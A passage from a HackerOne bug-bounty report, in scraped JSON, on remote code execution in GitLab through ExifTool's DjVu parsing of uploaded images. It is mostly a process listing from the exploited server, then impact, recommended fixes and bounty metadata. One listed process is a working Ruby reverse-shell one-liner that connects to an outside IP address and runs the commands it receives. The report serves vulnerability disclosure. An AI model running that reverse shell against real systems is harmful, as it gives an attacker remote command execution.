[ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T03:29:46", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T03:29:46", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T03:29:46", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ576AVYZG%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T032945Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEG4aCXVzLXdlc3QtMiJGMEQCIGkkfgXQGLY5jp9U2oqkAi%2FmLInMF1teJ4oUhbS8CCNSAiBfgqHOyNOVZmuJ